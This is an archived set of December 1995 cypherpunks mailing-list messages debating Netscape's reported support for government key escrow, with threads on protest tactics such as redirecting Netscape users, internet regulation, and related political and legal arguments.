jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@obscura.com>
Date: Fri, 1 Dec 1995 18:02:54 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Barring access to Netscape
Message-ID: <9512010953.AA26357@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 11/30/95 -0800, you wrote:
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.
>
Here is the Netscape specific code that does exactly this: 
<meta http-equiv="Refresh" content="1
;URL=http://www.cypherpunks.com/verysadtaleaboutnetscapeandgak.html"> 

It simply send the viewer to the URL listed after ";URL" bit. I use it on my
page to get to my Netscape optimized section (soon to go by the wayside).

Try it an see.

   Adam

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://www.compuvar.com/adam   |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 03:38:08 +0800
To: cypherpunks@toad.com
Subject: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <ace40c750602100466d1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:43 AM 12/1/95, Leslie Todd Masco wrote:

>I've been told that many media-types go to the archives whenever c'punks
>make the news.  How much of an effect do y'all think it'll have if they
>can't do it with Netscape?

Even better, let's see the journalists get the story first-hand.

I hope the media types reading now will attend the December 5th (I
think...details should be available) gathering on "key escrow" in
Washington. D.C. This should be a fiery meeting, especially if the Netscape
reps (I assume someone from Netscape will be attending, given their central
role in the all-important Web world) either denounce GAK or support GAK.

Frankly, and my thanks again to Sameer for bringing this to our attention,
this flap over Jim Clark's GAK-supporting remarks could not have come at a
better time: the issue of GAK will not be ignored.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 17:32:59 +0800
To: cactus@hks.net
Subject: Re: Barring access to Netscape
Message-ID: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>If Netscape really does go the GAK route, I will unilaterally
>do this to the Cypherpunk Archives (or something similar, like every
>request flashing up briefly and then client-pulling the GAK pages).

After talking to a couple of people, and playing around some, this seems
to be a better choice.  That way, you can actually send information (including
a list of where to get other browsers) instead of just garbage to netscape
users.  Is anyone aware of browsers other than Netscape that do client pulls?

A simple filter to do (and undo) this would still be useful, I think so that
users can easily fix all their documents.  Fortunately, that would be very
easy to write.

>I've been told that many media-types go to the archives whenever c'punks
>make the news.  How much of an effect do y'all think it'll have if they
>can't do it with Netscape?
>
>Shouldn't be too hard to hack this into Apache.

That's not a bad idea either.  Hopefully, Netscape will post a retraction
(soon!) and none of this will be necessary.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 18:27:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace40e9207021004e5e8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


With the assumption that this is not a troll, and giving the writer some
slack on account of the non-native-English-language origin, I'll respond to
a few of his or her points:

At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>With regard to all this waving about Netscape giving in to key scrow...

Key _escrow_, though "scrow" is perhaps just as accurate as the
improperly-named "key escrow" (hint: escrow is something done voluntarily,
not the situation here with GAK).

>First one question, and then some considerations. The question:
>
>- How much of Netscape stock is in the hands of Netscape? I mean in the hands
>of the people that work in/for the Company? And how much is in outsiders whose
>only interest is earning as much as possible?

A small fraction of the shares are now for sale. The exact numbers can be
gotten from the Netscape offering prospectus (ironically, I tried to hunt
for it in Infoseek, but Netscape claimed it was busy the 10 or so times I
tried to run Infoseek on "Netscape"...no conspiracy, just crowding, even at
1:45 a.m. PST).

In particular, the billion dollars' worth of Netscape stock (and/or
options) that Jim Clark holds is mostly not on the open market (and won't
be for years).

Having said this, I think all of the shareholders, either of issued shares
or as-yet-unissued shares, are interested in maximizing share value. Not
surprising.

Importantly--and maybe this is the real point JR is making--we on the
Cypherpunks list are probably *not* interested in Netscape's stock price.
But who cares? Our role is not to maximize Netscape stock price, but to
talk about what is "right" and what is not right. And GAK is definitely not
right, to the vast majority of us.

>That is, my friends, the key point. When Netscape began selling shares, and
>before and after that, they were (and still are) widely criticized in this
>list.

They were "criticized" not because they went public with their stock but
because of their security mistakes, made more important by their sudden
prominence. The Net/Web is being built up of beams, struts, and bricks, and
it's important to point out flaws that make the beams buckle and structures
collapse.

...
>So, now we have that most of Netscape is owned by people that either don't
>care but for money, or fundamental activists. And then, those people have to
>take decisions.

??? I don't get the point you're making. Sure, most of Netscape stock that
is publically traded is owned by investors. On the other hand, most of the
stock that is not yet issued or is tied up in unexercised stock options is
in a sense owned by people who care how well the stock does.

>And then they are faced with confronting their government who tells them what
>to do if they don't want to have problems. And who probably offers some hidden
>compensations to get their support (maybe tax reliefs?). And who menaces with
>countermeasures if they don't agree.

Well, this is the point, isn't it? I doubt there are such things as "tax
reliefs" for Netscape--these things are done pretty much out in the open in
the U.S., and any special tax treatment would be widely noticed--but there
may indeed have been "discussions" with senior management at Netscape.
Several of us have already speculated in broad terms on this.

Look, I don't impute personal malice to Jim Clark. I do, however, believe
in "institutional evil," in the sense that a GAK regiment which says, for
example, that anyone who keeps a diary must "escrow" copies of it with the
local police is an "evil" idea, counter to the Western notions of liberty
and justice.

Thus, for whatever reason Jim Clark came out in support of GAK, we must
criticize it. And take positive steps to counter it (which I think we are
doing).

>What did you expect Netscape to do? The guys with the money and the control
>won't face all the small shareholders and tell them they are going to be
>"evil" against the gov. and the priests and the religious organizations,
>and that they will face gov. restrictions, give up political and economic
>advantages, etc.. to satisfy a bunch of cypher
>punks that are continuously
>complaining publicly against the company and don't even buy shares.

First, a viable strategy is to simply do nothing. Ignore the goverment's
protestations, drag one's feet, shrug, etc. Jim Clark could simply have
said nothing. (Recall that Bill Gates came out recently saying that strong
encryption is inevitable...Clark could have either said nothing, or said
something similar to what Gates said.)

Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
truly pushes for GAK, and people reject GAK and Netscape, then this will
surely hurt shareholder value. (Frankly, I expect one or more stories to
appear in the next few days about the budding "Friends Don't Let Friends
Use Netscape" and "Just Say No to Netscape" movements. Whether this will
hurt the stock is unclear.)

>Sitting back and complaining won't help crypto, freedom or anything for that
>matter at all.
>
>That said, before blaming more on Netscape and asking a starting company
>whose major aset is still shareholders instead of sales, we should think
>better about the correct strategy.
>
>Now, who's gonna offer some constructive ideas for a change?

I say that the ideas being discussed are in fact "constructive" ideas.  I
won't reiterate them all here, but they clearly involve concrete action
(e.g., modifying server software to issue warnings to Netscape users, or
encouragement of alternatives to Netscape).

What more are you expecting? Have you been reading what people are actually
discussing doing and actually already doing?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Fri, 1 Dec 1995 17:09:22 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512010843.DAA23202@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James A. Donald <jamesd@echeque.com> wrote:
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.

If Netscape really does go the GAK route, I will unilaterally
do this to the Cypherpunk Archives (or something similar, like every
request flashing up briefly and then client-pulling the GAK pages).

I've been told that many media-types go to the archives whenever c'punks
make the news.  How much of an effect do y'all think it'll have if they
can't do it with Netscape?

Shouldn't be too hard to hack this into Apache.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML7AKCoZzwIn1bdtAQEPhAF9HY/ARaVLTFcvyQ1utx94uZ+ZmeXOemmO
2jnX4y/gDelAEO+C7kBAprm8GDyLhgJQ
=G5jT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Fri, 1 Dec 1995 12:30:29 +0800
To: sameer <sameer@c2.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301616.IAA18452@infinity.c2.org>
Message-ID: <Pine.3.89.9512010401.A6882-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> 	Jeff: If Netscape comes out in favor of GAK, will you leave?
> (Wait until February, at least, of course..) You don't have to answer
> that to me, or the list, just think about it, and answer it for
> yourself.  Do you think "anyone else" there would leave, as you say
> below that they don't want to go down history, etc...
> 

While this would go over well in the press if handled right please let 
everyone remember that Jeff is a real person with bills to pay and food 
to put on at least his own table.  Now if someone out there with their 
own business is willing to match his politics with his purse and offer 
Jeff a job at the same level if he *decides* to leave in the midst of GAK 
flak...

> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 1 Dec 1995 18:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: WTO an even worse possibility as Inet regulator.
Message-ID: <Pine.BSD.3.91.951201050752.28674C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
attila@primenet.com did the list a service when he sent his 
message, "WTO an even worse possibility as Inet regulator." 
 
Basing the message "on an article from the (London) Finan- 
cial Times," he states that 
 
   a very credible white paper is circulating for the WTO to 
   establish an internet CZAR to regualate the Internet... 
 
and he asks: 
 
   personally, the Feds and the FCC are bad enough --now 
   they want to have a **global** bureaucracy play god  -??? 
 
 
That 11 29 95 Financial Times newsstory is headlined: 
 
     Global regulator urged for information highway 
 
 
Who's doing the urging? 
 
The Royal Institute of International Telecommunications 
Policy put out a report written by a Shell man and a think- 
tank woman. 
 
As regards encryption, the RIITP people 
 
   ...point out that issues such as...encryption...have global 
   rather than national aspects. 
 
 
Then they contradict themselves: 
   
   "Encryption, for example, raises tricky and emotive issues 
   connected with...national security and cannot be treated 
   simply as a business problem." 
 
 
Whatever works!  They "encrypt" the ultimatums of the New World 
disorder in any...key. 
 
At the very end of the newsstory: 
 
   Global Superhighways, Chatham House, 10 St James 
   Square, London SW1Y 4LE 
 
 
I'm guessing Global Superhighways is the title of the RIITP 
report.  As for Chatham House... 
 
  In 1919 [a group of young men who became the dominant 
  influence in British imperial and foreign affairs up to 1939] 
  founded the Royal Institute of International Affairs (Chatham 
  House) for which the chief financial supporters were Sir Abe 
  Bailey and the Astor family (owners of The [London] Times). 
  Similar Institutes of International Affairs were established 
  in the chief British dominions and in the United States 
  (where it is known as the Council on Foreign Relations). 
 
    --Carroll Quigley [Clinton's mentor].  Tragedy and Hope. 
      A History of the World in Our Time.  Macmillan, 1966. 
      P 132. 
 
 
RIITP is probably a front for RIIA.  I conjecture, though, that 
the real publisher of the report has his house in Washington. 
 
I agree with jamesd@echeque.com who writes: 
 
        The main threat to freedom is still internal, 
                    rather than external. 
 
 
Looked at from the inside, of course. 
 
 
Cordially, 
 
Jim 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 1 Dec 1995 18:42:34 +0800
To: Jordan Hayes <jmhayes@netcom.com>
Subject: Re: A challenge ...
In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com>
Message-ID: <Pine.SUN.3.91.951201052933.12777B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jordan Hayes wrote:

> I've been challenged to try to find a bank account; I win the challenge
> if I can wire in $100 to the hidden account.  Anyone have any good
> ideas about how to find an ABA number?

For $95 I will do all the work for you.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 15:29:18 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <199512010519.VAA12922@blob.best.net>
Message-ID: <Pine.BSD.3.91.951201061914.17960C-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, James A. Donald wrote:

> At 08:40 PM 11/30/95 +0000, attila wrote:
> >	<attila sez>  but WTO is also accumulating a rather larger 
> >    bureaucracy and is challeng Uncle Sam on severl major unilateral
> >    actions.  [...] and it will be by the WTOs and world courts, or the
> >    Rockefeller NWO --read UN, and UN troops in America. 
> 
> This is excessively paranoid:  The main threat to freedom is still
> internal, rather than external.
>
    	<attila sez #2> I do not think it is particularly paranoid. the 
    trend is set. As the UN accumulates power it gains larger support from
    the third world who significantly out-vote, in terms of US standards
    of one man, one vote traditions. 

	 I also think it is going to be difficult for the permanent 
    members of the security counsel to justify their singular veto power 
    (except China, of course). The UN, as it is currently chartered
    effectively leaves the power in the hands of the security counsel; the
    general assembly generally is a forum for anti-American,
    anti-European, etc. rhetoric. 

	if the UN sets the court with open membership and no vetos, the 
    US is boxed into either defying the court with all the intendant
    public relations problems or surrendering its ecomnomic interests. 

        what it boils down to, a decison must be made between compelling 
    economic interests and one man, one vote; the latter choking the US 
    rather quickly.
 
> The major expansion of WTO power came because of the notorious
> corruption and one sidedness of American courts judging disputes
> between foreign and American businessmen.
>
       <attila sez #2>  got any real samples where forreign courts are 
    impartial to domestic interest v. US interests?
 
> Since WTO courts do not have WTO gunmen this amounts to a major
> separation of judicial and executive power, thus though it is
> a centralizing move, it is also a move that favors liberty an
> the rule of law.
>
        <attila sez #2> I think you're to idealistic as to the results 
    based on ideology!  or, maybe I am too cynical...  :)
 
> Of course the first stages in centralization always do, at first,
> favor liberty and the rule of law as they restrain corrupt and
> lawless local powers.  Later, much later, the centralized power
> becomes a greater threat to liberty than those local authorities
> that it restrained.  
>
	<attila sez #2>  here we agree 100%
 
> That stage is still a long way down the track, and very likely 
> the modern nation state will collapse first.
> 
        <attila sez #2> history is compressing the time frame as 
    new "history" is made.  As for the nation-state collapsing first, no, 
    I think it will be a case of the nation-state being helped along by
    the NWO or whatever globalization of power.

        I would certainly rather believe it is a long way off, but the US 
    is no longer solvent. It has gone from the largest creditor country in
    the world to the largest debtor (v. all the rest of the world
    combined) in a space of less than 50 years.  This is nothing more than
    a self serving bureaucracy promising all things to all people and
    blowing it on basic high school level economics --it is the equivalent
    of kiting checks or credit cards, for which we would go to jail. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 14:42:09 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010620.HAA28237@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

sameer wrote:

>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like 
>        Netscape.

Yes, bad. Yes, almost. Like a psychotic, Netscape has been teasing people with annoyingly buggy "betas," seeming to be well-intentioned, innocently clumsy, forgivable for its enthusiasm. Now the mask drops and we see the feral beast.

tcmay wrote:

> Jim Clark is actively working for the enemies of liberty and 
> freedom.

As usual, Tim states it concisely, even elegantly.

> I wonder what discussions Jim Clark has been having with the 
> Feds?

I can assure those who doubt this that Jim did not wake up one morning saying, "Gee, this security thing is just so-o-o-o big a nut to crack that we need to bump it upstairs to the Big Boys. Yeah! That's it! Uncle Sam will make the Internet safe for commerce! Boy, this is going to be a great day! Hey, Mom! Can I have a slice of your great apple pie for breakfast?  B-r-r-r!  It's brisk this morning! Mom, Where did you put my flag?"

With Netscape's sudden and surprising rise to prominence, its executives have no doubt been getting a crash course on what it's like to live in the world of people who take power and money VERY seriously. They've no doubt been disabused of childish notions and shown the glint of steely knives in the recesses of three-piece suits. No doubt more than one stomach plummeted to the sub-basement as they learned that Wonderland is populated by dark and deadly predators who don't just meekly make room for a new player.

Jim may not even be important enough to have been the one visited, but we can be sure someone was visited and explained some of the rules by which the full-contact professional game is played. What we are witnessing here is the loss of innocence, noticeable only because the time scale is so compressed by Netscape's explosive rise.

It's not even so much their caving that disgusts -- it's the hypocrisy. It's the lack of balls to say, "Guess what?  We got a most unusual visit by so-and-so who spoke unofficially for so-and-so, who wants us to know that we'll be toast if we push this issue of strong crypto."

It's as if someone you know suddenly takes up living with the creepy-crawlies in dark, damp places under rocks. One day you lift a rock and discover them there with some surprise, but instead of emerging or explaining, they say, "I like it here! This is the proper way to live!" and pull the rock back into place. It's not natural.

rjc wrote:

> What's the point? Surely Clark must realize that even if 
> Netscape adds key escrow to SSL/Secure Courier, it is still 
> possible to tunnel

and

> The genie is out of the bottle.

The Feds' approach to this kind of thing will be to make circumvention of escrow punishable by, say, a $10 million fine and 30 years in prison, with a teensy little provision that it doesn't matter how it comes to their attention.  That way, you not only run the risk that they find out by virtue of you having become a target of authorized eavesdropping, you run the risk that a, um, mistaken or, er, collateral eavesdrop reveals that your communications are circumventing escrow.

People in Montana and Nevada probably once thought the highway speed genie was out of the bottle, but all it took was fuel-shortage hype to enact a law effectively instituting a "national" speed limit, even though federal control of travel on roads outside federal reservations is wholly without constitutional authority.  

Most people have some contact with issues of cars, gasoline, speed, and fuel economy, yet there was barely a whimper. How likely is it that more than a few percent of the population will even grasp what is being done to them with key escrow and the PR flim-flam that will be used to spackle over the real issues?

jsw wrote:

> Please don't give up on us yet.

I have.  I'll reconsider when Jim reveals who inoculated him with GAK juice and when Netscape own up to how they caved and publicly disavow the position he advanced.

> All press accounts I've read so far have lots of stuff 
> attributed to Jim, but very little of it is actual quotes. 
> There appears to be lots of paraphrasing and interpretation 
> being done on the part of the reporters.  The impression that 
> I'm getting is that the press has blown a couple of small sound 
> bites way out of proportion.

Not to be overly dramatic, but this sounds like a non-policy German expatriate might have sounded in the late 1930's, trying to quell alarm over reports of atrocities filtering out of the Reich. It may be well-intentioned, but it's out of the loop.

> The infoworld article that covers the same speech only 
> devotes about 20% of the article to the key escrow topic, 
> and is similarly devoid of actual quotes.

This is the "turd in the punchbowl" principle, Jeff. Suppose your 
Presidential candidate sounded fine in 95% of his coverage, and only in 5% is he reported to advocate raising human children on farms for organ harvest? How big a turd does there have to be in the punchbowl before you will consider the punch unfit to drink? "Well, hell! There's only the ONE, and it's not even as big as the ice cubes!"  Right.

> I have not spoken to Jim about this, 

Uh-huh...

> and I did not hear the talk myself, 

Uh-huh...

> so I'm mostly reading between the lines here.  

Uh-huh.

> After I saw the story earlier today I started asking around 
> to see if the company had made any major policy shift in the 
> direction of GAK, and wasn't able to turn up anything.

So we're supposed to operate on the same blind faith you display. Right.

> My feelings about key escrow, which were echo'd by several 
> folks in management when I spoke to them today are...

Jeff, what you're revealing is a bit of confusion with respect to who runs the company. With all due respect, and taking your statements at face value without reading subterfuge into them, I believe you're in the dark, and positioned to get a hard lesson in real world corporate politics. Do you like your job? Do you have a mortgage? If this doesn't go down the way you think it's going, will YOU tell all?

> I don't want to go down in history as a facilitator of the 
> totalitarian state, and I don't think anyone else here does either.

Dark periods of history are full of well-intentioned people who, in the crunch, opted to save their own skins and facilitated whatever they were told to facilitate.

> ...and I hope everyone will judge us by what we do.

You can be sure of that. Meanwhile, if you really have principles, start taking names. Names, dates, places, things. If you're right, you can throw it all away later. If we're right, you'll have an opportunity to shed light on the process sometime down the road.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML6LT0jw99YhtpnhAQF7IgIAhHkHuYNJ0ncTEw27ZLU4FUSYQoxNJdyy
Ki08cJka/nAyD/D4iQyYB5Y3Jmppb5okFr+UxvdYmS+RZYFnNLfy8A==
=mCuE
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Fri, 1 Dec 1995 20:49:43 +0800
To: cypherpunks@toad.com
Subject: nsa and netscape
Message-ID: <951201073154.60201e3d@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  The following came from a government source. I thought it might be of
  interest. 
                       Bob
--------------------------------------------------------------------------

     At yesterdays FNC  (Federal Networking Council) meeting it was 
     mentioned in passing that NSA has given Netscape a grant of $5 Million 
     (yes $5M) to beef up the security features of Netscape. More info will 
     be forthcoming on this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 1995 19:01:01 +0800
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512021603.IAA00950@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote:
>
>  I think the gist
> of it is that if governments require key escrow, we will have to do it
> in order to sell our products with encryption into those countries.

Jim Clark wrote:
>> But if we do not come up with a solution to this problem that is
>> acceptable to each government, we will not be able to export our products,
>> except with a short key length (e.g. 40 bit keys), and that will not be
>> acceptable to corporate customers in other countries.

I read it as saying:  "Let us help the government invade the privacy
of our customers, so that the government will do us some favors in export 
licensing", rather than "Well if they stick it to us at gunpoint,
we will submit."

I would appreciate some further "clarification".

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 22:07:24 +0800
To: Jeff Hupp <jhupp@novellnet.gensys.com>
Subject: Re: "Got a subpoena?"
In-Reply-To: <26C7BF95B31@Novellnet.Gensys.com>
Message-ID: <Pine.BSF.3.91.951201084815.27648B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jeff Hupp wrote:
> 	And at that point, you shut down the remailer and log each and every 
> bounce.
> 
> 	Now, they could get an order forcing you to run a remailer ~ but that 
> would open up a whole new can of worms i.e. can you be forced, under 
> court order, to commit a crime?

No.  I'm sure someone will come up with an exception, but generally no.   
You can't be drafted into the FBI.  Then there's the 13th amendment 
argument ...

EBD


> 
> -- 
> JHupp@gensys.com           |For PGP Public Key:
> http://gensys.com          |finger jhupp@gensys.com
> Autocracy is based on the assumption that one man is wiser
> than a million men.  How's that again?  I missed something.
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 22:12:47 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512010307.WAA18467@homeport.org>
Message-ID: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Adam Shostack wrote:

> 
> 	One thing that stockholders do care about is liability.  Its
> my (non lawyerly) opinion that anyone implementing GAK without a
> government mandate to do so is opening themselves up to huge liability
> the Clipper database of keys gets out.

Well that would depend on the terms of the agreement to hold the escrowed 
keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
write the agreement so that it says, in essence, "we will try really 
really hard not to let the keys out, but if they get out, our only 
liability if to say 'Ooops' followed by a heartfelt apology!"

EBD


> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 16:19:57 +0800
To: cypherpunks@toad.com
Subject: Re: A challenge ...
Message-ID: <199512010800.JAA00893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>I've been challenged to try to find a bank account; I win the challenge
>if I can wire in $100 to the hidden account.  Anyone have any good
>ideas about how to find an ABA number?

      This sounds like the "this is your last chance to send me $1!" ad:

      Announcing the 'Bank Account' Hack. 
      Rules: Wire me $100. 
      Reward: I'll give you a T-shirt.

      The *real* challenge will be getting your $100 back.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sat, 2 Dec 1995 03:14:01 +0800
To: OpsAn@gnn.com (Michael Coates)
Subject: [NOISE]Re: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <m0tLYrM-000RuGC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 11/30/95, Michael Coates wrote:
>Found this intersting too.  US Position?
>
>AUTHOR A VIRUS, GO TO JAIL
>A computer cracker last week became the first virus writer sentenced to a
>jail term under Great Britain's Computer Misuse Act.  The 26-year-old
>perpetrator was sentenced to 18 months in jail after pleading guilty to 11
>charges connected with placing virus-infected programs on computer bulletin
>boards.  (Investor's Business Daily 29 Nov 95 A6)

Gak.. glad I don't live in G.B. as I have had as many as 700 virii available
for download on my BBS.. wonder how long it will be  before the start to
prosecute authors for writing buggy software ;)

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 02:56:00 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Barring access to Netscape
In-Reply-To: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
Message-ID: <199512011706.JAA26955@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The field is User-Agent. However, blocking access to users of Navigator 
> isn't a particularly useful thing to do. If you must do something, why 
> not modify your GET handler to add a header to the start of all html 
> pages informing people of the problem, and suggesting alternatives. 

	I haven't modified my GET, but at the top of all the standard
c2.org web pages (http://www.c2.org/) if you are using pre-1.12
netscape, it barfs at you with a nasty message. I plan on adding a
line for all netscape browsers, with a link to Lance's page, once it
is ready. (Maybe it is ready now, I just haven't looked yet.)

> 
> Someone else [I can't remember, but I'll call them Alice] claimed that the
> security problems showing up were part of a deliberate conspiracy.  To
> anyone who knows anything about the history of these things knows how
> absurd this is. The principals at Netscape are a nice bunch of really
> guys, but were not really up to speed on issues like security and
> networking- for example, the first incarnation of SSL had an RC4 stream
> running with no checksumming whatsoever. The security problems that
> resulted are due to the learning curve.
> 
> Simon
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 01:55:55 +0800
To: fstuart@vetmed.auburn.edu (Frank Stuart)
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
